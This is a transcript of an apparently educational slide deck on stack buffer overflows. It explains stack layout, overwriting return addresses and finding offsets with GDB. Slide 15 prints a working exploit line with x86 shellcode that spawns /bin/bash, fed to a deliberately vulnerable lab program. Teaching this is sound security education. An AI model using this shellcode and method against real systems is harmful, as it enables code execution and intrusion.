Presentation is loading. Please wait.

Presentation is loading. Please wait.

Buffer Overflows ...or How I Learned to Never Trust the User

Published byMarian Matthews Modified over 6 years ago

Similar presentations

Presentation on theme: "Buffer Overflows ...or How I Learned to Never Trust the User"— Presentation transcript:

1 Buffer Overflows ...or How I Learned to Never Trust the User
#!bin/bash

2 What is a Buffer Overflow?
A buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffers boundary and overwrites adjacent memory locations. To put it simply, this occurs when the program attempts to store more data than it allocated space for and overwrites something else.

3 How Does This Happen?! Issue: Easy fix:

4 A Better Example What happens when this code runs?

5 A Detailed Look esp – stack pointer Address of Instruction
Hex Value of Instruction 'Human Readable' Instruction

6 Simpler Please... 0xff00 0xff04 0xff08 0xff0C 0xff10 0xff14 0xff18
0x0804a040 %esp %eax 0xff00 0xff40 0x00 0xff19 0x00

7 The Stack After Copying
0xff00 0xff04 0xff08 0xff0C 0xff10 0xff14 0xff18 Thi 0xff1C s_st 0xff20 ring 0xff24 _is_ 0xff28 too_ 0xff2C long 0xff30 _for 0xff34 _tha 0xff38 t_bu 0xff3C ffer 0xff40 !\n\0 0xff19 0x0804a040 0x72 = 'r' 0x65 = 'e' 0x66 = 'f'

8 Control the Flow of the Program

9 Overwriting the Return Address
When a function is called the program stores the address it was at on the stack so it can return once the function has finished If we can overwrite that area of the stack we can control where the program goes after the function returns

10

11 What else?! This program seems to be lacking code…
LETS ADD SOME OF OUR OWN

12 Steps to Shellcode... This code is used to open a shell. Found online.

13 Steps to Shellcode... Using GDB debugger we can find the address we need to call This shows me where the stack pointer is before any memory is allocated in vulnerableFunction (0xffffd0f0). We can use this to figure out where our code will be written.

14 Steps to Shellcode... We can see that the spot being allocated is at a -0x3a offset from ebp which is at the same value esp was when we looked in gdb. 0xffffd0f0 – 0x3a = 0xffffd0b6 This also tells us that we need to write 0x3a bytes to write the return address

15 Putting it all together
Python -c “print '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a \x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80' + 'a'*25 + '\xb6\xd0\xff\xff'" > outputfile Our code Offset Address ./exploitable $(cat outputfile)

16 Where to Learn More! Overthewire.org – narnia challenges
microcorruption.com Hacking: The Art of Exploitation - Erickson

Download ppt "Buffer Overflows ...or How I Learned to Never Trust the User"

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
15-213 Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo

Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.

Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Computer Security Buffer Overflow lab Eu-Jin Goh.

Computer Security Buffer Overflow lab Eu-Jin Goh.
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh

Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.

Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,

Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.

Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.

CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.
1 Application Security: Electronic Commerce and E-Mail Chapter 9 Copyright 2003 Prentice-Hall.

1 Application Security: Electronic Commerce and Chapter 9 Copyright 2003 Prentice-Hall.

Similar presentations

Ads by Google